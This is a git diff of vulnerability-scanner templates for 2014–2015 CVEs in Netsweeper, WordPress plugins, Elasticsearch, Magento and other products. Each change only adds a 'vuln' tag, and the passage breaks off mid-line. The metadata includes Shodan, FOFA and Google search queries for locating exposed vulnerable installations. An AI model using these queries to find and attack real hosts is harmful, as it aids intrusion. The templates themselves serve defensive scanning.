index 9e0f545be27..3935fa8364b 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: netsweeper product: netsweeper - tags: cve2014,cve,netsweeper,xss,packetstorm + tags: cve2014,cve,netsweeper,xss,packetstorm,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index 719be9620d4..4d46f697ffc 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: netsweeper product: netsweeper - tags: cve2014,cve,packetstorm,netsweeper,xss + tags: cve2014,cve,packetstorm,netsweeper,xss,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index e57950b60f2..ce24db6e263 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: netsweeper product: netsweeper - tags: cve2014,cve,netsweeper,xss,packetstorm + tags: cve2014,cve,netsweeper,xss,packetstorm,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-9609.yaml b/http/cves/2014/CVE-2014-9609.yaml index af84b3972f8..17e836ba39c 100644 --- a/http/cves/2014/CVE-2014-9609.yaml +++ b/http/cves/2014/CVE-2014-9609.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: netsweeper product: netsweeper - tags: cve2014,cve,netsweeper,lfi,packetstorm,xss + tags: cve2014,cve,netsweeper,lfi,packetstorm,xss,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index 467c71d1f03..50d733ea7b4 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: netsweeper product: netsweeper - tags: cve2014,cve,netsweeper,default-login,packetstorm,xss + tags: cve2014,cve,netsweeper,default-login,packetstorm,xss,vuln http: - raw: diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml index 111410972b2..58c33d170f6 100644 --- a/http/cves/2014/CVE-2014-9615.yaml +++ b/http/cves/2014/CVE-2014-9615.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: netsweeper product: netsweeper - tags: cve2014,cve,netsweeper,xss,packetstorm + tags: cve2014,cve,netsweeper,xss,packetstorm,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index 4d8727ba9dd..21c8efbf08a 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: netsweeper product: netsweeper - tags: cve2014,cve,netsweeper,redirect,packetstorm,xss + tags: cve2014,cve,netsweeper,redirect,packetstorm,xss,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index c2394a9b1dc..bc2ee4e0f31 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: netsweeper product: netsweeper - tags: cve2014,cve,netsweeper,auth-bypass,packetstorm,edb,xss + tags: cve2014,cve,netsweeper,auth-bypass,packetstorm,edb,xss,vuln http: - method: GET diff --git a/http/cves/2014/CVE-2014-9735.yaml b/http/cves/2014/CVE-2014-9735.yaml index 353c100250e..623171132e0 100644 --- a/http/cves/2014/CVE-2014-9735.yaml +++ b/http/cves/2014/CVE-2014-9735.yaml @@ -24,7 +24,7 @@ info: vendor: themepunch product: showbiz_pro framework: wordpress - tags: cve,cve2014,wordpress,revslider,fileupload,rce,plugin,wp,unauth,intrusive,vkev + tags: cve,cve2014,wordpress,revslider,fileupload,rce,plugin,wp,unauth,intrusive,vkev,vuln variables: marker: "{{randstr}}" diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml index 385bbb9c5e7..10cfb6e9210 100644 --- a/http/cves/2015/CVE-2015-0554.yaml +++ b/http/cves/2015/CVE-2015-0554.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: adb product: p.dga4001n_firmware - tags: cve2015,cve,pirelli,router,disclosure,edb,packetstorm,adb + tags: cve2015,cve,pirelli,router,disclosure,edb,packetstorm,adb,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index 8634776ab96..749ee318d78 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -29,7 +29,7 @@ info: vendor: candidate-application-form_project product: candidate-application-form framework: wordpress - tags: cve2015,cve,wpscan,wordpress,wp-plugin,lfi,wp,candidate-application-form_project + tags: cve2015,cve,wpscan,wordpress,wp-plugin,lfi,wp,candidate-application-form_project,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-1000010.yaml b/http/cves/2015/CVE-2015-1000010.yaml index a2203485ca6..b4ce9780652 100644 --- a/http/cves/2015/CVE-2015-1000010.yaml +++ b/http/cves/2015/CVE-2015-1000010.yaml @@ -28,7 +28,7 @@ info: vendor: simple-image-manipulator_project product: simple-image-manipulator framework: wordpress - tags: cve2015,cve,packetstorm,wpscan,wordpress,wp-plugin,lfi,wp,simple-image-manipulator_project + tags: cve2015,cve,packetstorm,wpscan,wordpress,wp-plugin,lfi,wp,simple-image-manipulator_project,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml index 460bdfb0cd7..0ccf36f4248 100644 --- a/http/cves/2015/CVE-2015-1000012.yaml +++ b/http/cves/2015/CVE-2015-1000012.yaml @@ -29,7 +29,7 @@ info: product: mypixs framework: wordpress google-query: inurl:"/wp-content/plugins/mypixs" - tags: cve,cve2015,wordpress,wp-plugin,lfi,wpscan,mypixs_project + tags: cve,cve2015,wordpress,wp-plugin,lfi,wpscan,mypixs_project,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-10141.yaml b/http/cves/2015/CVE-2015-10141.yaml index bf3b804f1e9..44175e98877 100644 --- a/http/cves/2015/CVE-2015-10141.yaml +++ b/http/cves/2015/CVE-2015-10141.yaml @@ -22,7 +22,7 @@ info: metadata: verified: true max-request: 1 - tags: cve,cve2015,oast,rce,vulhub,php,debug,xdebug,intrusive + tags: cve,cve2015,oast,rce,vulhub,php,debug,xdebug,intrusive,vuln http: - raw: diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index 98d1a11972d..cf502296fcf 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -28,7 +28,7 @@ info: vendor: elasticsearch product: elasticsearch fofa-query: index_not_found_exception - tags: cve2015,cve,packetstorm,elastic,rce,elasticsearch,kev,vkev + tags: cve2015,cve,packetstorm,elastic,rce,elasticsearch,kev,vkev,vuln http: - raw: diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index 34998eac758..72d96907da8 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -39,7 +39,7 @@ info: - intitle:"icewarp server administration" - intitle:"icewarp" - powered by icewarp 10.4.4 - tags: cve2015,cve,lfi,mail,packetstorm,icewarp + tags: cve2015,cve,lfi,mail,packetstorm,icewarp,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml index b8e021c0b8f..1b886448668 100644 --- a/http/cves/2015/CVE-2015-1579.yaml +++ b/http/cves/2015/CVE-2015-1579.yaml @@ -30,7 +30,7 @@ info: product: divi framework: wordpress google-query: inurl:/wp-content/plugins/revslider - tags: cve2015,cve,wordpress,wp-plugin,lfi,revslider,wp,wpscan,elegant_themes,vkev + tags: cve2015,cve,wordpress,wp-plugin,lfi,revslider,wp,wpscan,elegant_themes,vkev,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-1635.yaml b/http/cves/2015/CVE-2015-1635.yaml index c9819e2e8ad..9f26f172657 100644 --- a/http/cves/2015/CVE-2015-1635.yaml +++ b/http/cves/2015/CVE-2015-1635.yaml @@ -29,7 +29,7 @@ info: - '"Microsoft-IIS" "2015"' - '"microsoft-iis" "2015"' - cpe:"cpe:2.3:o:microsoft:windows_7" - tags: cve,cve2015,kev,microsoft,iis,rce,vkev + tags: cve,cve2015,kev,microsoft,iis,rce,vkev,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index 543ec4ddebf..444c10a205f 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -35,7 +35,7 @@ info: fofa-query: - body="/remote/login" "xxxxxxxx" - icon_hash=945408572 - tags: cve2015,cve,xss,fortigates,intrusive,fortinet + tags: cve2015,cve,xss,fortigates,intrusive,fortinet,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-20067.yaml b/http/cves/2015/CVE-2015-20067.yaml index 9efd6e7b1ab..c3d44d54398 100644 --- a/http/cves/2015/CVE-2015-20067.yaml +++ b/http/cves/2015/CVE-2015-20067.yaml @@ -29,7 +29,7 @@ info: product: wp_attachment_export framework: wordpress google-query: inurl:"/wp-content/plugins/wp-attachment-export/" - tags: wpscan,packetstorm,seclists,cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export,wp_attachment_export_project + tags: wpscan,packetstorm,seclists,cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export,wp_attachment_export_project,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index b3c3b7aa3b3..bb74e8ddc9a 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -30,7 +30,7 @@ info: shodan-query: - http.component:"Magento" - http.component:"magento" - tags: cve2015,cve,plugin,edb,packetstorm,lfi,magento,magmi,magmi_project,magento_server,vkev + tags: cve2015,cve,plugin,edb,packetstorm,lfi,magento,magmi,magmi_project,magento_server,vkev,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index 5ee93c57feb..1b1b7ab0648 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -31,7 +31,7 @@ info: shodan-query: - http.component:"Magento" - http.component:"magento" - tags: cve2015,cve,plugin,edb,packetstorm,magento,magmi,xss,magmi_project,magento_server + tags: cve2015,cve,plugin,edb,packetstorm,magento,magmi,xss,magmi_project,magento_server,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml index b7119e8351c..570b3c0ddb3 100644 --- a/http/cves/2015/CVE-2015-2080.yaml +++ b/http/cves/2015/CVE-2015-2080.yaml @@ -26,7 +26,7 @@ info: vendor: fedoraproject product: fedora shodan-query: cpe:"cpe:2.3:o:fedoraproject:fedora" - tags: cve2015,cve,jetty,packetstorm,fedoraproject + tags: cve2015,cve,jetty,packetstorm,fedoraproject,vuln http: - method: POST diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index 2a66f52d6e7..952e058281f 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: ericsson product: drutt_mobile_service_delivery_platform - tags: cve2015,cve,lfi,ericsson,edb,packetstorm + tags: cve2015,cve,lfi,ericsson,edb,packetstorm,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index fc98b2adc59..1137c5a174e 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -28,7 +28,7 @@ info: vendor: web-dorado product: spider_calendar framework: wordpress - tags: time-based-sqli,cve2015,cve,wordpress,wp,sqli,wpscan,wp-plugin,spider-event-calendar,unauth,edb,web-dorado + tags: time-based-sqli,cve2015,cve,wordpress,wp,sqli,wpscan,wp-plugin,spider-event-calendar,unauth,edb,web-dorado,vuln http: - raw: diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index e4c3c7ba2e9..5408c9e671f 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -30,7 +30,7 @@ info: vendor: ab_google_map_travel_project product: ab_google_map_travel framework: wordpress - tags: packetstorm,cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,authenticated,ab_google_map_travel_project + tags: packetstorm,cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,authenticated,ab_google_map_travel_project,vuln http: - raw: diff --git a/http/cves/2015/CVE-2015-2794.yaml b/http/cves/2015/CVE-2015-2794.yaml index 23c3dd09198..f035ac1ede0 100644 --- a/http/cves/2015/CVE-2015-2794.yaml +++ b/http/cves/2015/CVE-2015-2794.yaml @@ -28,7 +28,7 @@ info: fofa-query: - app="DotNetNuke" - app="dotnetnuke" - tags: cve2015,cve,dotnetnuke,auth-bypass,install + tags: cve2015,cve,dotnetnuke,auth-bypass,install,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index 10680d583f2..85da49b4671 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -29,7 +29,7 @@ info: product: "navis_documentcloud" framework: wordpress google-query: "inurl:\"/wp-content/plugins/navis-documentcloud\"" - tags: cve2015,cve,wordpress,wp-plugin,xss,documentcloud + tags: cve2015,cve,wordpress,wp-plugin,xss,documentcloud,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml index 46a2eb08b5d..989536970f4 100644 --- a/http/cves/2015/CVE-2015-2863.yaml +++ b/http/cves/2015/CVE-2015-2863.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: kaseya product: virtual_system_administrator - tags: cve2015,cve,redirect,kaseya,vkev + tags: cve2015,cve,redirect,kaseya,vkev,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index 7e9eef25015..da427cfe79e 100644 --- a/http/cves/2015/CVE-2015-2996.yaml +++ b/http/cves/2015/CVE-2015-2996.yaml @@ -30,7 +30,7 @@ info: product: sysaid shodan-query: http.favicon.hash:1540720428 fofa-query: icon_hash=1540720428 - tags: cve2015,cve,sysaid,lfi,seclists + tags: cve2015,cve,sysaid,lfi,seclists,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index 1e04df3ac5a..4d9fc2c0251 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -34,7 +34,7 @@ info: - http.title:"tp-link" fofa-query: title="tp-link" google-query: intitle:"tp-link" - tags: cve2015,cve,router,lfi,seclists,tplink,kev,tp-link,vkev + tags: cve2015,cve,router,lfi,seclists,tplink,kev,tp-link,vkev,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml index c866e1de2a3..fe3f3a97d2f 100644 --- a/http/cves/2015/CVE-2015-3224.yaml +++ b/http/cves/2015/CVE-2015-3224.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: rubyonrails product: web_console - tags: cve2015,cve,ruby,hackerone,rce,rails,intrusive,rubyonrails + tags: cve2015,cve,ruby,hackerone,rce,rails,intrusive,rubyonrails,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index 743d3794255..a536a0aff5f 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml @@ -28,7 +28,7 @@ info: vendor: elasticsearch product: elasticsearch fofa-query: index_not_found_exception - tags: cve2015,cve,packetstorm,edb,elastic,lfi,elasticsearch,plugin + tags: cve2015,cve,packetstorm,edb,elastic,lfi,elasticsearch,plugin,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml index 33a33a05325..dfc27eb4f2a 100644 --- a/http/cves/2015/CVE-2015-3648.yaml +++ b/http/cves/2015/CVE-2015-3648.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: montala product: resourcespace - tags: cve2015,cve,lfi,resourcespace,packetstorm,montala + tags: cve2015,cve,lfi,resourcespace,packetstorm,montala,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index 6082abfe863..e250c8a2417 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: bonitasoft product: bonita_bpm_portal - tags: cve2015,cve,unauth,packetstorm,bonita,lfi,bonitasoft,vkev + tags: cve2015,cve,unauth,packetstorm,bonita,lfi,bonitasoft,vkev,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index b5f334849e6..6a20b333a6e 100644 --- a/http/cves/2015/CVE-2015-4050.yaml +++ b/http/cves/2015/CVE-2015-4050.yaml @@ -28,7 +28,7 @@ info: vendor: sensiolabs product: symfony shodan-query: cpe:"cpe:2.3:a:sensiolabs:symfony" - tags: cve2015,cve,symfony,rce,sensiolabs + tags: cve2015,cve,symfony,rce,sensiolabs,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index 4363c9d1444..cc630ef010f 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -30,7 +30,7 @@ info: vendor: newstatpress_project product: newstatpress framework: wordpress - tags: time-based-sqli,cve2015,cve,authenticated,sqli,wp-plugin,newstatpress,packetstorm,wordpress,wp,newstatpress_project + tags: time-based-sqli,cve2015,cve,authenticated,sqli,wp-plugin,newstatpress,packetstorm,wordpress,wp,newstatpress_project,vuln http: - raw: diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml index 9e6ff0207f2..0efe90c2b3c 100644 --- a/http/cves/2015/CVE-2015-4063.yaml +++ b/http/cves/2015/CVE-2015-4063.yaml @@ -29,7 +29,7 @@ info: vendor: newstatpress_project product: newstatpress framework: wordpress - tags: cve2015,cve,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm,newstatpress_project + tags: cve2015,cve,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm,newstatpress_project,vuln http: - raw: diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index ca67f543b6f..258b5d1d407 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ b/http/cves/2015/CVE-2015-4074.yaml @@ -28,7 +28,7 @@ info: vendor: helpdesk_pro_project product: helpdesk_pro framework: joomla\! - tags: cve2015,cve,lfi,packetstorm,edb,joomla,plugin,helpdesk_pro_project,joomla\!,xss,vkev + tags: cve2015,cve,lfi,packetstorm,edb,joomla,plugin,helpdesk_pro_project,joomla\!,xss,vkev,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index 85da5eea9e7..f6b984b41ec 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -29,7 +29,7 @@ info: vendor: "church_admin_project" product: "church_admin" framework: wordpress - tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project + tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml index 7b3e5d8135b..9ab7dd376fe 100644 --- a/http/cves/2015/CVE-2015-4414.yaml +++ b/http/cves/2015/CVE-2015-4414.yaml @@ -29,7 +29,7 @@ info: product: se_html5_album_audio_player framework: wordpress google-query: inurl:"/wp-content/plugins/se-html5-album-audio-player" - tags: cve2015,cve,wordpress,wp-plugin,lfi,edb,packetstorm,se_html5_album_audio_player_project + tags: cve2015,cve,wordpress,wp-plugin,lfi,edb,packetstorm,se_html5_album_audio_player_project,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-4455.yaml b/http/cves/2015/CVE-2015-4455.yaml index c85cc32655d..19c2672e9f1 100644 --- a/http/cves/2015/CVE-2015-4455.yaml +++ b/http/cves/2015/CVE-2015-4455.yaml @@ -23,7 +23,7 @@ info: vendor: "aviary_image_editor_add-on_for_gravity_forms_project" product: "aviary_image_editor_add-on_for_gravity_forms" framework: wordpress - tags: cve,cve2015,packetstorm,intrusive,file-upload,wordpress,aviary_image_editor_add-on_for_gravity_forms_project,vkev + tags: cve,cve2015,packetstorm,intrusive,file-upload,wordpress,aviary_image_editor_add-on_for_gravity_forms_project,vkev,vuln variables: filename: '{{rand_base(7, "abc")}}' diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml index e010a4c9da8..5ba2c6216fb 100644 --- a/http/cves/2015/CVE-2015-4632.yaml +++ b/http/cves/2015/CVE-2015-4632.yaml @@ -28,7 +28,7 @@ info: vendor: koha product: koha shodan-query: cpe:"cpe:2.3:a:koha:koha" - tags: cve2015,cve,lfi,edb,koha + tags: cve2015,cve,lfi,edb,koha,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index a720890b539..cbb9a4151fb 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: xceedium product: xsuite - tags: cve2015,cve,xceedium,xsuite,lfi,packetstorm,xss + tags: cve2015,cve,xceedium,xsuite,lfi,packetstorm,xss,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index 80c65d8bf6e..84de0474dff 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: xceedium product: xsuite - tags: cve2015,cve,redirect,xsuite,xceedium,edb + tags: cve2015,cve,redirect,xsuite,xceedium,edb,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml index 3309a2c4604..fe19cd89833 100644 --- a/http/cves/2015/CVE-2015-4694.yaml +++ b/http/cves/2015/CVE-2015-4694.yaml @@ -29,7 +29,7 @@ info: product: zip_attachments framework: wordpress google-query: inurl:"/wp-content/plugins/zip-attachments" - tags: cve2015,cve,wp-plugin,wpscan,lfi,wordpress,zip_attachments_project + tags: cve2015,cve,wp-plugin,wpscan,lfi,wordpress,zip_attachments_project,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-5354.yaml b/http/cves/2015/CVE-2015-5354.yaml index 34afd2dd6e0..e262fb4e61a 100644 --- a/http/cves/2015/CVE-2015-5354.yaml +++ b/http/cves/2015/CVE-2015-5354.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: novius-os product: novius_os - tags: cve2015,cve,packetstorm,redirect,novius,novius-os,xss + tags: cve2015,cve,packetstorm,redirect,novius,novius-os,xss,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index aa067907c35..4c3e87bf3eb 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -29,7 +29,7 @@ info: product: stageshow framework: wordpress google-query: inurl:"/wp-content/plugins/stageshow/" - tags: cve2015,cve,wpscan,seclists,redirect,wordpress,wp-plugin,stageshow_project + tags: cve2015,cve,wpscan,seclists,redirect,wordpress,wp-plugin,stageshow_project,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml index 268c61389a6..2cc95219e71 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml @@ -28,7 +28,7 @@ info: vendor: mdc_youtube_downloader_project product: mdc_youtube_downloader framework: wordpress - tags: cve2015,cve,wp,lfi,mdc_youtube_downloader_project,wordpress + tags: cve2015,cve,wp,lfi,mdc_youtube_downloader_project,wordpress,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index 38851730db9..ea4d7e6e3ae 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -28,7 +28,7 @@ info: product: swim_team framework: wordpress google-query: inurl:"/wp-content/plugins/wp-swimteam" - tags: cve2015,cve,wordpress,wp-plugin,lfi,wpscan,packetstorm,swim_team_project + tags: cve2015,cve,wordpress,wp-plugin,lfi,wpscan,packetstorm,swim_team_project,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index 0b8f032f407..96cc2ddf480 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml @@ -28,7 +28,7 @@ info: vendor: elasticsearch product: elasticsearch fofa-query: index_not_found_exception - tags: cve2015,cve,vulhub,packetstorm,elasticsearch,intrusive,vkev + tags: cve2015,cve,vulhub,packetstorm,elasticsearch,intrusive,vkev,vuln http: - raw: diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml index f0f6ce66665..f0dc9d806cb 100644 --- a/http/cves/2015/CVE-2015-5688.yaml +++ b/http/cves/2015/CVE-2015-5688.yaml @@ -28,7 +28,7 @@ info: vendor: geddyjs product: geddy framework: node.js - tags: cve2015,cve,geddy,lfi,geddyjs,node.js + tags: cve2015,cve,geddy,lfi,geddyjs,node.js,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-6477.yaml b/http/cves/2015/CVE-2015-6477.yaml index 84d625dd82c..729717129b2 100644 --- a/http/cves/2015/CVE-2015-6477.yaml +++ b/http/cves/2015/CVE-2015-6477.yaml @@ -28,7 +28,7 @@ info: vendor: nordex product: nordex_control_2_scada shodan-query: http.title:"Nordex Control - Wind Farm Portal" - tags: cve,cve2015,nordex,nc2,seclists,packetstorm,xss,iot + tags: cve,cve2015,nordex,nc2,seclists,packetstorm,xss,iot,vuln http: - raw: diff --git a/http/cves/2015/CVE-2015-6544.yaml b/http/cves/2015/CVE-2015-6544.yaml index aa6e57d6cf3..5ccfde06525 100644 --- a/http/cves/2015/CVE-2015-6544.yaml +++ b/http/cves/2015/CVE-2015-6544.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: combodo product: itop - tags: cve2015,cve,xss,itop,combodo + tags: cve2015,cve,xss,itop,combodo,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index 7a954fb8394..4dbd63ab6f1 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml @@ -25,7 +25,7 @@ info: vendor: "sourceafrica_project" product: sourceafrica framework: wordpress - tags: cve2015,cve,wp-plugin,xss,packetstorm,wordpress,sourceafrica_project + tags: cve2015,cve,wp-plugin,xss,packetstorm,wordpress,sourceafrica_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml index 5f14a6a52fd..730ecc0d945 100644 --- a/http/cves/2015/CVE-2015-7245.yaml +++ b/http/cves/2015/CVE-2015-7245.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: d-link product: dvg-n5402sp_firmware - tags: cve2015,cve,dlink,lfi,packetstorm,edb,d-link + tags: cve2015,cve,dlink,lfi,packetstorm,edb,d-link,vuln http: - raw: diff --git a/http/cves/2015/CVE-2015-7297.yaml b/http/cves/2015/CVE-2015-7297.yaml index 9bf79e06017..b75ff0a970f 100644 --- a/http/cves/2015/CVE-2015-7297.yaml +++ b/http/cves/2015/CVE-2015-7297.yaml @@ -32,7 +32,7 @@ info: - http.component:"joomla" - cpe:"cpe:2.3:a:joomla:joomla\!" fofa-query: body="joomla! - open source content management" - tags: cve2015,cve,packetstorm,joomla,sqli + tags: cve2015,cve,packetstorm,joomla,sqli,vuln variables: num: "999999999" diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index 2fff5f03524..a622a05ec52 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -28,7 +28,7 @@ info: vendor: genetechsolutions product: pie_register framework: wordpress - tags: cve,cve2015,wordpress,wp-plugin,xss,packetstorm,genetechsolutions + tags: 